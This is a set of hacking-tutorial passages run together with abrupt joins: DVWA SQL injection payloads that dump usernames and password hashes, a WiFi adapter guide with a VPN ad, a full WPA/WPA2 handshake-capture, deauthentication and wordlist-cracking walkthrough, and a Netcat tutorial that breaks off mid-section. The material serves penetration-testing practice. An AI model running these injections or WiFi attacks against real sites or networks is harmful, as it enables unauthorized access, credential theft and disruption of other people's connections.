Enter the query below in the USER ID field and click Submit.

test' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #

From the output above, you see we have the First_name, Surname, and user_id fields listed.

Display all the column contents in the information schema users table

This is much more interesting. We will display all the authentication information of all users in the database. That includes password hashes. Enter the query below.

test' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #

From the output above, you can see the hashed password. We can go ahead and crack the hash to reveal the actual password. Some of the password cracking tools that come in handy include John the Ripper and Medusa. There are also websites where you can paste the password hash to reveal the actual password.

In this example, we will use crackstation.net to crack the password hash for the second user with the surname – Gordon.

How To Prevent SQL Injection Attacks

The main reason that makes web applications vulnerable to SQL injections dates back to the development (coding) stage. Here are some factors developers can consider to develop secure web systems.

• Validate user input
• Limit the use of special characters such as string concatenation
• Use stored procedures in the database
• Actively install security patches and updates
• Implement a Web Application Firewall
• Harden your Operating System and Applications

Summing Up

As of 2021, OWASP Top 10, a Security Framework, listed SQL injection as the number one attack mainly used by hackers and poses a significant impact on businesses and organizations. From the examples above, I believe you now understand how and why SQL injection attacks are the leading cause of massive data leaks.

The DVWA is a reliable platform where penetration testers can practice their skills and understand how various web vulnerabilities are exploited.

Most don’t know what they are, why we need them, and how to select the best adapter since we have so many brands and models available in the market.

A wireless adapter is a device that you connect to your computer via the USB port, and it allows you to connect to WiFi networks and communicate with other devices on the network.

🔥 My go-to VPN: 60% Off Special

Been using VPNBaron as my go-to for years. Their Trojan protocol makes it actually undetectable when needed, support is crazy responsive, and they’re running a rare 60% off right now. Works on all devices, adapts to whatever you’re trying to do.

1.99$/month

However, you might wonder: “Why would I need a USB network adapter since my laptop already has an inbuilt adapter that enables me to connect to wireless networks?”

Well, this is among the topics that we will discuss in this post:

• Problems with Built-in Wireless Cards
• Best WiFi adapters for hacking
• How to connect a wireless adapter to Kali Linux Virtual machine

Problems With Built-in Wireless Cards

There are two main problems with built-in WiFi adapters.

1. They can’t be used in Virtual machines – Kali inside a VM does not see the built-in WiFi card of your laptop as a WiFi adapter but will see it as an ethernet adapter. Hence you can have full internet access, but you cannot do packet injection or place the WiFi card into monitor mode.
2. Most built-in cards are not suitable for hacking – In wireless hacking, there are two main factors that we look out for in adapters. That is ‘packet infection’ and support for ‘monitor mode.’ Unfortunately, most of the built-in adapters support non of these two features.

Best WiFi Adapters for Hacking (With Monitor Mode)

Before diving into the different WiFi adapter brands and models, we first need to understand the Wireless Chipset present in these adapters. Like the CPU we have in a computer, this chipset is the “Brains” of the wireless adapter.

It is responsible for all the processing and calculation of data flowing through it. It also determines the capability of the wireless adapter. Whether it can support monitor mode, packet injection, and works with Kali Linux or not.

Some of the chipset supported by Kali Linux include:

• Realtek RTL8812AU
• Realtek 8187L
• Ralink RT5370N
• Ralink RT3572
• Ralink RT5572
• Ralink RT3070
• Ralink RT307
• Atheros AR9271
• MT7610U
• MT7612U

I understand all this information looks gibberish as of now; however, you will appreciate it when we look at the different WiFi adapters available and the chipset they use.

You will notice that the ALFA Networks company highly dominates the Wireless adapter market. Over the past couple of years, the company has risen to stand as the perfect supplier for efficient and reliable WIFI adapters. Other companies include TP-Link and Panda.

The table below shows a list of wireless adapters supported by Kali Linux and the Chipset, Frequency, and Protocol they are using.

Important: When it comes to TP-LINK TL-WN722N, it’s important to know that you can also get v2/v3 to work with a few workarounds, although it’s sometimes assumed that only v1 works.

A great and detailed tutorial on this topic is this one from David Bombal – Kali Linux TP-Link TP-WN722N.

TL-WN722N is a decent budget WiFi adapter for our purposes, but it’s sometimes difficult to find v1 in your immediate area, so v2/v3 is definitely a good option.

In some cases you won’t find the adapter’s version in the product description, so I think it’s definitely good to know you can make it work no matter which of those versions it is.

Connect a Wireless Adapter to Kali Linux Virtual Machine (VirtualBox)

To connect a wireless adapter to your Kali Linux virtual machine, when using VirtualBox, you can go in the Oracle VM VirtualBox menu > Devices > USB > [select_your_adapter].

It may not list the name of the WiFi Adapter, but something related to the chipset, instead. Here, I’m using a TP-LINK TL-WN722N 2.4GHz v2/v3, and as you can see, it’s displaying Realtek 802.11n NC.

Automatically Connect the WiFi Adapter to a VirtualBox VM

You can also automatically connect a wireless adapter to your Kali Linux virtual machine, when running VirtualBox. This way, you don’t have to manually connect it every time

To do this follow the steps below:

1. Shutdown the Kali virtual machine if it was already running
2. Connect your Wireless USB adapter to your PC
3. Right-click on your Kali Virtual machine and select the Settings option. A window will open displaying all the different configuration options.
4. Click on the USB option and check the Enable USB controller check box.
   
   

   

   
   
   We will need to add a USB filter on this window that will enable us to mount our wireless adapter to the Kali VirtualBox VM.
5. Click on the USB icon that has a plus (+) sign and select your Wireless adapter.
   Note: Be careful since the adapter may appear with the chipset na,e instead of the Brand name. For example, my adapter in this case is TP-LINK TL-WN722N 2.4GHz v1 but was listed under the chipset name Atheros AR9271.
   
   If you are not sure of the adapter’s name, just remove it, and you will notice the name that will disappear from the VirtualBox USB list.
   
   

   

   
   
6. Your wireless adapter will be listed under the “USB Device Filters” section.
   
   

   

   
   
7. To finalize everything, right-click on your newly added USB filter and select the Edit Filters option.
   A window will open listing all the details about your wireless adapter. Then, on the Remote option, click on the dropdown and select Yes.
   
   

   

   
   
8. Click Ok to save your configurations.

Connect a Wireless Adapter to Kali Linux Virtual Machine (VMware Player)

To connect a wireless adapter to your Kali Linux virtual machine, when using VMware Player, you can go to the VMware Player menu > Player > Removable Devices > [your_adapter] > Connect (Disconnect from host).

It may not list the name of the WiFi Adapter, but something related to the chipset, instead. Here, I’m using a TP-LINK TL-WN722N 2.4GHz v2/v3, and as you can see, it’s displaying Realtek 802.11n NC.

You should then receive a message informing you that the device will be safely stopped and disconnected from the host machine, so it can then be connected to Kali Linux in the VMware player.

I’m not sure of an easy way how you can automatically connect a WiFi Adapter with VMware Player, as we did with VirtualBox. The solution in VMware knowledge base seems to involve a bit of work https://kb.vmware.com/s/article/1648, and I haven’t tried it myself. If anyone has an easier solution for this and would like to share, then we’d love to hear from you.

Conclusion

Now you can boot your Kali VM and start practicing your wireless hacking skills. You can list all the wireless networks around you and even put your card in monitor mode.

I believe up to this point, you have a working wireless adapter on your Kali Linux VirtualBox machine. Please remember when selecting an adapter for wireless hacking to ensure the chipset used is among the chipsets listed above.

That involves, Cracking WIFI passwords (WEP, WPA, WPA2), Deauthentication attacks (disconnecting users on a WIFI network), Man In The Middle (MITM) attacks, packet-sniffing, and packet-analysis.

This post will give you a detailed guide on cracking WPA/WPA2 WiFi passwords using Kali Linux.

Important: In this article I’ll be demonstrating how to crack a password on my WiFi network. Please do not use this method for non-ethical purposes.

Understanding How Networks Operate

Before looking at how to crack WiFi passwords, you need to understand how a network operates. A network usually contains several devices connected using a wired (Ethernet, Fiber, etc.) or wireless connection (WiFi, Bluetooth, etc.) to share resources. An excellent example of a resource that we connect to networks to access is the Internet.

Whether you are on a wired or wireless network, one device is always considered a server. For example, if you are on a home network, the server would be the router/Access point. To connect to the internet, a Device(A) will send a request to the router, which will, in turn, fetch what you want from the Internet. Data transmitted between the client and the Access Point is known as Packets.

This tutorial will teach you how to capture these packets and use them to crack WPA and WPA2 passwords.

Managed Mode and Monitor Mode?

Every device with access to the internet comes with a chip known as the Network Interface Card (NIC). This chip is responsible for capturing packets sent by the router to our device.

By default, it is set to Managed Mode. That means it can only listen to packets sent directly to our device (packets with our devices’ MAC address as the destination MAC). To crack a WPA or WPA2 WIFi, we need to capture many of these packets. Therefore, we will set our NIC to Monitor Mode. In Monitor Mode, the card will listen to all packets being sent by the router capturing as many packets as possible.

Up to this point, I believe you now have the basic knowledge required to get you started with Network hacking. Boot your Kali Linux machine, and we can begin to crack WiFi passwords.

An Overview of How The Method Works

To give you a short and simple overview so you know what’s coming up, we will:

1. Set our wireless network adapter in monitor mode so it can listen for packets
2. List all available WiFi networks
3. Target a single WiFi network from which we’ll try to capture Handshake packets – these are packets transmitted between the router and the client computer, when they’re trying to establish a connection. We want to capture these packets, because some of them will contain the hashed password.
4. We won’t be decrypting the hashed password, but it still provides a valuable clue. Next we’ll use a large list of popular passwords, and we’ll turn each one into a hashed form, and compare them with the WiFi password, in it’s hashed form, that we got from listening to packets.
5. When the hashes match, this means that we found the password.

Important Notes

1. In our tutorial we’ll use a popular list of passwords, called rockyou.txt, that comes with Kali Linux.
2. If the password you’re trying to crack isn’t in the passwords list, also called wordlist, then we won’t be able to crack it.
3. You can check if the password is in the wordlist by running something like sudo grep -F 'yourpassword' /usr/share/rockyou.txt.
4. Keep in mind that /usr/share/rockyou.txt is archived by default, into /usr/share/rockyou.txt.gz, so you’ll have to extract it first. To do this you can run:
   cd /usr/share/wordlists && sudo gzip -d rockyou.txt.gz

Step 1. Put Your Card in Monitor Mode

On your Kali machine, open the Terminal and execute the command below to list all the connected network devices.

ifconfig

Or

ip a

Related: In case you’re also running Kali Linux in a virtual machine, here is a tutorial on how to connect wireless adapter to Kali Linux in VirtualBox/VMware – Connecting a Wireless Adapter to a Kali Linux Virtual Machine. It also covers the types of wireless adapters you can place in monitor mode and that can do packet injection.

In Kali, the Wireless card will be listed as something like wlan0. I’m using Kali Linux in VirtualBox, with a wireless adapter connected.

In my case, the WiFi network is listed as wlan0:

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.2.15  netmask 255.255.255.0  broadcast 10.0.2.255
        inet6 fe80::a00:27ff:fe2f:7ffe  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:2f:7f:fe  txqueuelen 1000  (Ethernet)
        RX packets 1  bytes 590 (590.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 16  bytes 1452 (1.4 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 16  bytes 880 (880.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 16  bytes 880 (880.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 2312
        unspec ca-d3-dd-57-cf-30-00-B9-00-00-00-00-00-00-00-00  txqueuelen 1000  (UNSPEC)
        RX packets 20790  bytes 0 (0.0 B)
        RX errors 0  dropped 20790  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

To put your wireless adapter in monitor mode (a mode where the adapter can capture all kinds of WiFi packets) , we will use a tool known as airmon-ng. Execute the command below and replace wlan0 with the name of your wireless card.

sudo airmon-ng start wlan0

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    399 NetworkManager
   1142 wpa_supplicant

PHY     Interface       Driver          Chipset

phy0    wlan0           8188eu          TP-Link TL-WN722N v2/v3 [Realtek RTL8188EUS]
                (mac80211 monitor mode already enabled for [phy0]wlan0 on [phy0]wlan0)

Note: You won’t access the internet with your card in monitor mode. It will not even be listed under the network devices on your Settings app.

If your card keeps reverting to Managed mode, you will need to kill all interfering processes with the command below.

sudo airmon-ng check kill

Killing these processes:

    PID Name
   1142 wpa_supplicant

To check whether your card was successfully put to monitor mode, execute the command below:

iwconfig

lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11b  ESSID:""  Nickname:"<WIFI@REALTEK>"
          Mode:Monitor  Frequency:2.457 GHz  Access Point: Not-Associated   
          Sensitivity:0/0  
          Retry:off   RTS thr:off   Fragment thr:off
          Power Management:off
          Link Quality=0/100  Signal level=-100 dBm  Noise level=0 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

From the image above, you can see the wlan0 card is set to Monitor mode. In some cases, the Kali system will add the suffix “mon” to any card in Monitor mode. For example, wlan0 would be renamed to wlan0mon. If that’s the case for you, that is the name you will use anytime you want to call the WiFi card.

Step 2. Test Your Card For Packet Injection

In most wireless attacks, you will need to perform packet injection (Forging or spoofing packets) and unfortunately, not all Network Cards support packet injection.

To test your card for packet injection, execute the command below and ensure you are near WiFi networks. Remember to replace wlan1 with the name of your wireless card in monitor mode.

sudo aireplay-ng --test wlan0

20:10:12  Trying broadcast probe requests...
20:10:12  Injection is working!
20:10:14  Found 7 APs

20:10:14  Trying directed probe requests...
20:10:14  73:6F:5F:92:73:DD - channel: 1 - 'N00bLx Office'
20:10:14  Ping (min/avg/max): 1.831ms/9.501ms/16.956ms Power: -65.80
20:10:14  30/30: 100%

From the image above, you can see my card can inject packets into the network. If that’s not the case for you, you can buy a USB Network card (WiFi dongle) that supports packet injection.

You can also find a list of recommended network cards, along with beginner friendly explanations, in our related tutorial Connecting a Wireless Adapter to a Kali Linux Virtual Machine.

Step 3. Packet Sniffing Using Airodump-ng

Now that we have enabled Monitor mode on our wireless card and even tested it for packet injection, we can now capture packets on our WiFi networks. We will use a tool known as airodump-ng. Execute the command below and press Enter.

sudo airodump-ng <wifi-card-in-monitor-mode>

In my case, I’ll run:

sudo airodump-ng wlan0

CH  4 ][ Elapsed: 12 s ][ 2021-08-27 20:16                                                
                                                                                          
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID           
                                                                                          
17:5A:78:5B:AE:56  -69       44        0    0   1   65   WPA2 CCMP   PSK  Mrs. Test WiFi Network
07:E1:B2:8E:0E:82  -50       49        0    0   6   54e. WPA2 TKIP   PSK  N00bLx Bathroom WiFi          
17:93:7E:F0:FF:A8  -51       41       35    5   1  130   WPA2 CCMP   PSK  The Neighbour       
D3:DA:6D:87:61:86  -52       45        0    0   6   54e. WPA  TKIP   PSK  <length:  0>    
73:6F:5F:92:73:DD  -57       41        0    0   1  130   WPA2 CCMP   PSK  N00bLx Office       
73:E4:D1:03:B1:8D  -65       37        0    0   1  130   WPA2 CCMP   PSK  Mayor's Office      
9B:9D:78:DC:92:43  -67       45        0    0   8  130   WPA2 CCMP   PSK  Sheshe          
AB:25:7A:0A:5C:42  -77       33        4    0   8  130   WPA2 CCMP   PSK  Skynet-4114   
AB:AA:DC:10:4D:3F  -76       27        0    0  10  130   WPA2 CCMP   PSK  Mark_cdd5e8     
B3:10:82:55:F1:57  -86       21        0    0  11  130   WPA2 CCMP   PSK  MARK-7NfA       
2F:78:E6:5B:0F:2B  -93       40        1    0   5  540   WPA2 CCMP   PSK  home network     
AB:30:6D:D1:31:E5  -93       27        0    0   6  130   WPA2 CCMP   PSK  Mobile-1615   
F3:F1:AE:18:A2:46  -93        4        0    0   1   48   WPA2 CCMP   PSK  MrBot_80     
63:8C:27:81:CB:8D  -93        2        0    0  11  130   WPA2 CCMP   PSK  UPC2076594      
D7:BF:F1:DF:52:23  -93        3        0    0   5  130   WPA2 CCMP   PSK  Bob      
EB:48:C0:6D:98:35  -86       24        7    2   3  130   WPA2 CCMP   PSK  TP-Link_47F0    
07:E1:06:1A:32:B1  -89       35        0    0  11  130   WPA2 CCMP   PSK  Some Netowrk       
4F:FB:76:4D:66:EA  -93       14        0    0  11  130   WPA2 CCMP   PSK  Mobile-746339   
9B:53:21:87:20:38  -93       17        2    0   3  130   WPA2 CCMP   PSK  LALA124173       
E3:88:A3:6E:6B:F5  -93        5        0    0   1  130   WPA2 CCMP   PSK  HAI-Fh9n       
CB:9B:94:7E:0A:AE  -93        2        0    0   1  130   WPA2 CCMP   PSK  BATMAN2629688      
6B:8B:B1:59:88:0E  -93        9        0    0   1  130   WPA2 CCMP   PSK  HI              
                                                                                     
                                                                                          
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes         
                                                                                          
(not associated)   33:C6:35:3F:05:D8  -94    0 - 1     41       10         LALA-4qnS      
(not associated)   57:B1:C8:C5:37:1B  -94    0 - 1      0        1                        
0F:93:59:43:F0:E4  23:1D:97:42:42:F3   -1    1e- 0      0        3                        
0F:93:59:43:F0:E4  9B:C5:40:6E:34:34   -1    1e- 0      0        3                        
0F:93:59:43:F0:E4  13:17:36:01:1A:D2   -1    1e- 0      0        2                        
0F:93:59:43:F0:E4  53:85:C5:90:21:D9  -74    1e- 1e     8       12

You will see a screen similar to the one in the image above. The program will continue running unless you close it using Ctrl + C or Ctrl + Z.

Let’s discuss the information on this screen.

• BSSID: This column displays the MAC address of the target network. That is the MAC address of the router or the Access Point.
• PWR: This is the signal strength or the power of the network. The closer the number is to zero, the better signal we will get.
• Beacons: These are frames sent by the Access point to broadcast its existence
• Data: These are the valuable data packets or frames that will help us in cracking wireless networks
• #/S: This column shows us the number of data packets we have collected in the last 10 seconds
• CH: This column indicates the channel on which the network is operating.
• MB: That indicates the maximum speed supported by the network.
• ENC: This column indicates the encryption used by the network
• CIPHER: Indicates the Cipher used on the network
• Auth: This shows the mode of authentication used to connect to the network
• ESSID: This column indicates the name of the WIFI network

In this step, all we did was random packet sniffing. We did not target any particular WiFi network or store the sniffed packets.

However, that is useful since it gives you detailed information about networks near you.

In the next step, we will look at targeted packet sniffing.

Step 4. Targeted Packet Sniffing

The difference between WPA and WPA2 is that WPA uses TKIP (Temporal Key Integrity Protocol) while the latter is capable of using TKIP and any other advanced AES algorithm. However, the method that we will use to crack the password is the same for both networks.

To crack WPA/WPA2 wifi networks, we will utilize the handshake packets. These are four packets transmitted between the router and the client when establishing a network connection. To capture packets on a specific network, we will use the syntax below.

sudo airodump-ng --bssid <MAC-of-AccessPoint> --channel <channel-number> --write <name-of-file> <card-name>

From the image above, I will be cracking the password for the network with ESSID “Mrs. Test WiFi” I will use the command below.

sudo airodump-ng --bssid 17:5A:78:5B:AE:56 --channel 1 --write mrstestwifiPackets wlan0

Now all you need to do is sit back and wait for the tool to capture as many Handshake packets as possible.

CH  1 ][ Elapsed: 6 s ][ 2021-08-27 20:20                                                                                      
                                                                                                                               
BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                            
                                                                                                                               
17:5A:78:5B:AE:56  -22  93       88        0    0   1   65   WPA2 CCMP   PSK  Mrs. Test WiFi Network                           
                                                                                                                               
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

However, there is one problem.

Handshake packets are only captured once – when a device connects to the network. Therefore, to capture as many handshake packets as possible, we will need to use an attack to remove users from the network and reconnect. Deauthentication attack. That will help us capture more handshake packets.

To carry out a deuathentication attack, open a new Terminal, while leaving the current one running and trying to capture Handshake packets, and execute the command below:

sudo aireplay-ng --deauth 50 -a <BSSID-MAC> <Wireless-Card>

In my case, I’ll run:

sudo aireplay-ng --deauth 50 -a 17:5A:78:5B:AE:56 wlan0

20:32:03  Waiting for beacon frame (BSSID: 17:5A:78:5B:AE:56) on channel 1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
20:32:03  Sending DeAuth (code 7) to broadcast -- BSSID: [17:5A:78:5B:AE:56]
20:32:03  Sending DeAuth (code 7) to broadcast -- BSSID: [17:5A:78:5B:AE:56]
20:32:04  Sending DeAuth (code 7) to broadcast -- BSSID: [17:5A:78:5B:AE:56]
20:32:05  Sending DeAuth (code 7) to broadcast -- BSSID: [17:5A:78:5B:AE:56]
20:32:05  Sending DeAuth (code 7) to broadcast -- BSSID: [17:5A:78:5B:AE:56]
20:32:06  Sending DeAuth (code 7) to broadcast -- BSSID: [17:5A:78:5B:AE:56]
...

The command will send 50 deauthentication packets, which are enough to disconnect several clients from the router. Once they reconnect, we will capture their handshake packets. All these packets are stored in the “mrtestwifiPackets” file we specified when performing a targeted sniffing.

Step 5. Cracking WPA/WPA2 Using a Wordlist

When we have captured enough Handshake packets, we can start to crack them using a wordlist.

Execute the ls command on your working directory. You will see several files with the name which you specified to save your sniffed packets. Look for the file with the .cap extension. That is the file we will use to crack our WiFi password.

The tool that we will use is known as aircrack-ng. Use the syntax below:

sudo aircrack-ng <packet-file-name> -w <wordlist_path>

In my case, I will run:

sudo aircrack-ng mrstestwifiPackets.cap -w /usr/share/wordlists/rockyou.txt

And here is the successfully cracked WiFi key.

As you can see where it says KEY FOUND! [ mrpassword].

This process might take some time, depending on your wordlist and the complexity of the key. Some tips you can use to speed up the process are using the GPU, which is much faster, or uploading the captured handshake file to an online cracking site. These sites use powerful computers which can crack passwords even faster. You can also create your wordlist using a Python or Bash script or use the crunch tool.

Conclusion

This tutorial has given you a detailed guide on cracking WPA/WPA2 key against a wordlist. With a large wordlist, you can easily crack different combinational passwords. However, if the key is very complex, using a wordlist may not always work. If you encountered any issues, then feel free to let us know in the comments and we’ll get back to you as soon as we can.

This tool can be used for creating any connections over TCP or UDP protocol which makes it an excellent debugging tool. It helps the user investigate connections directly by connecting to them.

Netcat can also perform port scanning, file transfer, and sometimes it might be used by the hackers or penetration testers for creating a backdoor into a system.

In this tutorial, we’ll be covering the Netcat utility or nc command in detail.

Netcat was developed back in 1995. Despite its usefulness and popularity, it was not maintained. Many other versions of it have been developed since then. One of the most prominent among them is called Ncat, developed by the Nmap project.

Ncat expands on the features of the traditional Netcat package. We’ll also touch on some of the functionalities of this tool.

However Ncat lacks the port scanning feature that Netcat has. This is because Nmap can already be has much more advanced port scanning capabilities.

I have installed Ncat and will be using it this tutorial, but I’ll refer to the software by both Ncat or Netcat.

Installing traditional Netcat & Ncat

Netcat is available for Linux, Windows, and macOS.

If you’re running a Linux machine, chances are Netcat is already installed. However, you do need to install Netcat in other operating systems.

Ncat is not available on any of the operating systems by default, so we’ll have to install it no matter what OS we’re using.

Installing Ncat on Linux

If you’re running Debian or Ubuntu-based systems, you can install it using the apt utility. To install ncat run:

sudo apt-get install ncat

On Redhat or CentOS-based distros, you can use yum. To install ncat run:

sudo yum install ncat

Notice: If you install Ncat then the nc or netcat command will use Ncat by default.

Installing Ncat will allow all the functionalities of the traditional Netcat and much more.

Installing Ncat on Windows

You can install Ncat on Windows by installing Nmap – and it will be installed alongside it.

To install Nmap you’ll use their self-installer, which you can find here https://nmap.org/download.html. Find and download the latest stable self-installer, which looks something like this nmap--setup.exe, and then run it after it’s downloaded.

Installing Ncat on MAC OS X

You should be able to get Ncat installed alongside Nmap. To install Nmap on Mac OS X you can check the installation instructions on Nmap.org.

You can also find a very short section with instructions on how to install Nmap on Mac OS X in our Nmap tutorial, should you have issues with the instructions on their site.

Installing Ncat on Android with Termux

Assuming that you already have Termux installed on your Android, you can install Ncat by installing Nmap.

To do this update your package index:

apt update

Then install Nmap by running:

pkg install nmap

Basics of connections with Netcat

Before we learn how to use the tool, let’s learn some basics of how it works.

Netcat can produce different types of connections based on how you use it. Traditional nc command will only work over the TCP and UDP protocol. However, the Ncat command supports SSL, IPv6, etc.

You can think of Netcat to be performing the tasks of both the client and the server in a Client-Server based connection model. You can read more about this model in our tutorial, Basics of HTTP Requests with cURL, under the Basics of HTTP Requests & Responses section.

In short, you can create a server listening in any port and a client connecting to any port with Netcat.

Let’s see how to create a client and a server with Netcat.

Creating a client with Netcat

If you’re reading this tutorial, then most likely you’re using some browser. Your browser work as a client to get the page from our nooblinux.com server.

You can create a client by connecting to any host and port you like with Netcat.

Netcat has a basic syntax of:

nc [options] host port

You can use the -n flag to enter numeric-only or the IP address of the host; which will bypass the DNS name resolution:

nc -n [IP address] port

Type in the hostname or IP address and Port with the nc command to create a client:

nc -v example.com 80

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 93.184.216.34:80.

Note: I’m using Ncat throughout this article. If you’re using Netcat, your output for the above command may look like this:

Connection to example.com 80 port [tcp/http] succeeded!

Here, we created a client with Ncat connecting to the example.com server on port 80.

Once you run this command you’ll see nothing is happening after this.

This just means that you’ve connected with the server.

It might feel unusual because most of us are used to a prompt symbol that indicates the system’s readiness to perform the next command, but this is just how it works with Netcat/Ncat.

Now you can request the server and then get a response.

Let’s try to send something to the server.

Type in some text after the output texts shown above and hit Enter twice (this is because some requests require multiple lines, so the first Enter is a newline, and the second one it sends the request). It can be any text. I’ll just write hi.

Let’s see what response we get from the server:

Warning: inverse host lookup failed for 93.184.216.34: Unknown host
example.com [93.184.216.34] 80 (http) open
hi

HTTP/1.0 501 Not Implemented 
Content-Type: text/html 
Content-Length: 357 
Connection: close 
Date: Sat, 10 Jul 2021 20:07:39 GMT 
Server: ECSF (dcb/7F60) 

<?xml version="1.0" encoding="iso-8859-1"?> 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" 
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head> 
<title>501 - Not Implemented</title> 
</head> 
<body> 
<h1>501 - Not Implemented</h1> 
</body> 
</html> 

We sent hi to the server and then the server sent us the response that you can see in the output. The server sent us the Status code 501 Not Implemented which means the server does not support the functionality to fulfill our request.

That’s a given. Let’s request something that a server understands.

HTTP Requests with Netcat

If you know anything about HTTP requests then you should know that your browser performs a GET request to show you a webpage. After you have connected to the server, your browser sends special messages to the server with the request and the server responds accordingly.

cURL is a very good utility that can perform any HTTP requests (we also have a tutorial on cURL if you’re interested Basics of HTTP Requests with cURL: An In-Depth Tutorial).

Let’s find out what it sends to get a response back from the server.

Run the curl command in a verbose mode (-v) and set the -I flag or --head option to only see the Request and Response Headers:

curl -v -I example.com

*   Trying 93.184.216.34:80...
* TCP_NODELAY set
* Connected to example.com (93.184.216.34) port 80 (#0)

> HEAD / HTTP/1.1
> Host: example.com
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Accept-Ranges: bytes
Accept-Ranges: bytes
< Age: 443586
Age: 443586
< Cache-Control: max-age=604800
Cache-Control: max-age=604800
< Content-Type: text/html; charset=UTF-8
Content-Type: text/html; charset=UTF-8
< Date: Sat, 10 Jul 2021 20:16:51 GMT
Date: Sat, 10 Jul 2021 20:16:51 GMT
< Etag: "3147526947"
Etag: "3147526947"
< Expires: Sat, 17 Jul 2021 20:16:51 GMT
Expires: Sat, 17 Jul 2021 20:16:51 GMT
< Last-Modified: Thu, 17 Oct 2019 07:18:26 GMT
Last-Modified: Thu, 17 Oct 2019 07:18:26 GMT
< Server: ECS (dcb/7F38)
Server: ECS (dcb/7F38)
< X-Cache: HIT
X-Cache: HIT
< Content-Length: 1256
Content-Length: 1256

<
* Connection #0 to host example.com left intact

As you can see in the output, lines 1 to 3 are the Connection part. The next section, lines 5 to 9,  is the request that curl, which in this case is our client, sent to the server. The later section is the Response Header that the server sent back.

Now, when you’re running Netcat, the lines 1 to 3 portion is being performed at first. Then you can talk to the server. Let’s generate the same response using Netcat.

To get the response from the server, we have to craft the request message first. The head request portion of the output from the curl command is:

HEAD / HTTP/1.1
Host: example.com
User-Agent: curl/7.74.0
Accept: */*

Now let’s connect Netcat to example.com again.

nc -v example.com 80

Now copy and paste the above portion (the GET Request), after the the Ncat: Connected to 93.184.216.34:80. output, in the Netcat terminal and hit Enter twice.

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 93.184.216.34:80.
HEAD / HTTP/1.1
Host: example.com
User-Agent: curl/7.74.0
Accept: */*

HTTP/1.1 200 OK
Age: 594540
Cache-Control: max-age=604800
Content-Type: text/html; charset=UTF-8
Date: Sat, 10 Jul 2021 22:33:44 GMT
Etag: "3147526947+ident"
Expires: Sat, 17 Jul 2021 22:33:44 GMT
Last-Modified: Thu, 17 Oct 2019 07:18:26 GMT
Server: ECS (dcb/7EA3)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 1256

This is great! You’ve just got the same Request and Response Headers that you got using cURL as your client.

Important: At first glance this response may not look the same as with cURL, because the cURL response has duplicate lines – if you look closely, the responses are near identical.

Let’s try OPTIONS request instead of HEAD request. This time we’ll just type the request in, since it’s shorter.

First we’ll connect to the example.com server.

nc -v example.com 80

We’ll get the usual output:

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 93.184.216.34:80.

After which we’ll just write the OPTIONS request OPTIONS / HTTP/1.0 and press Enter twice:

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 93.184.216.34:80.
OPTIONS / HTTP/1.0

HTTP/1.0 200 OK
Allow: OPTIONS, GET, HEAD, POST
Date: Sun, 11 Jul 2021 11:34:16 GMT
Server: ECS (dcb/7F14)
Content-Length: 0
Connection: close

Using Printf and Piping with Netcat

Important Note: Sometimes you might get some error while typing the requests inside Netcat. That is because HTTP requests require certain formatting with Line Endings.

There also may be other reasons that your requests don’t work, as such it’s good to know that you have an alternative method of making requests and sending them through Netcat.

You can also try any request piping the output of printf command into Netcat.

To do this, run the following command outside of Netcat:

printf "HEAD / HTTP/1.1\r\nUser-Agent: curl/7.74.0\r\nHost: example.com\r\nAccept: */*\r\n\r\n" | nc example.com 80

In this command, \r create the new lines for the HTTP request.

These are called carriage return (cr) and line feed (lf). These names are derived from the age of typewriters.

You basically sent the same HEAD request as before, but wrote it on one line.

HEAD / HTTP/1.1
Host: example.com
User-Agent: curl/7.74.0
Accept: */*

Becomes:

HEAD / HTTP/1.1\r\nUser-Agent: curl/7.74.0\r\nHost: example.com\r\nAccept: */*\r\n\r\n

After that, we use the printf command (print formatted), which properly formats our the request, so then we pass it on to Netcat through piping (the | symbol).

Creating a Server with Netcat

In previous sections, we showed you how to create a client with Netcat.

You essentially learned what a browser does to request a webpage from the server.

Now we’ll show you how the server responds with the help of Netcat.

Netcat can start listening on any port you specify. This is what gives it the ability to create a server on the fly.

Let’s learn how to listen on a port with netcat before we get started.

Listening on a port with Netcat

